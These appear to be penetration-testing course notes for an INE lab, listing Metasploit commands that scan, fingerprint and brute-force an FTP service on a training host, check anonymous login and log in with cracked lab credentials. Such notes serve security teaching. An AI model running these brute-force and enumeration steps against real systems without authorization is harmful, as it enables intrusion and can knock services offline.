- FTP (File Transfer Protocol) is generally hosted on the 21/tcp port, and is used to facilitate file sharing between a server and its clients.
- It is also frequently used as a means of transferring files to and from the directory of a web server.
- FTP authentication utilizes a username and a password combination, however, in some cases an improperly configured FTP server can be logged into anonymously.
- We can use multiple auxiliary modules to enumerate information as well as perform brute-force attacks on target running an FTP server.

Practical Demonstration
		- `service postgresql start`
		- `ifconfig`
		- `msfconsole`
		- `workspace -a ftp_enum`
	- Running a port scan to enumerate the port that the FTP service is running on.
		- `search portscan`
		- `use auxiliary/scanner/portscan/tcp`
		- `show options`
		- `set RHOSTS demo.ine.local`
		- `run`
	- Searching for useful FTP auxiliary modules.
		- `search ftp`
		- `search type:auxiliary name:ftp`
	- Using an auxiliary module to perform FTP Version Enumeration.
		- `use auxiliary/scanner/ftp/ftp_version`
		- `options`
		- `set RHOSTS demo.ine.local`
		- `run`
	- Searching for an exploit to use on the FTP service, based on the service version we found during enumeration.
		- `search ProFTPD`
	- Using the `ftp_login` module to perform a bruteforce attack on the FTP service, to determine login credentials.
		- `search type:auxiliary name:ftp`
		- `use auxiliary/scanner/ftp/ftp_login`
		- `set RHOSTS demo.ine.local`
		- `set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt`
		- `set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt`
		- `run`
		- The efficacy of brute-force attacks is based on the wordlist provided for the attack.
		- The Metasploit Framework comes bundled with many wordlists that we can use.
		- If a brute-force attack is being performed on a service, it may lead to the service being unavailable.
	- Using Metasploit modules to check if anonymous login is enabled on the FTP service.
		- `search type:auxiliary name:ftp`
		- `use auxiliary/scanner/ftp/anonymous`
		- `set RHOSTS demo.ine.local`
		- `run`
	- Logging into the FTP service using credentials validated through the brute-force attack.
		- `ftp demo.ine.local`
		- `sysadmin`
		- `654321`

Methodology
	- Enumeration, including Version Detection
	- Vulnerability Assessment
	- Anonymous Login
	- Brute-force attack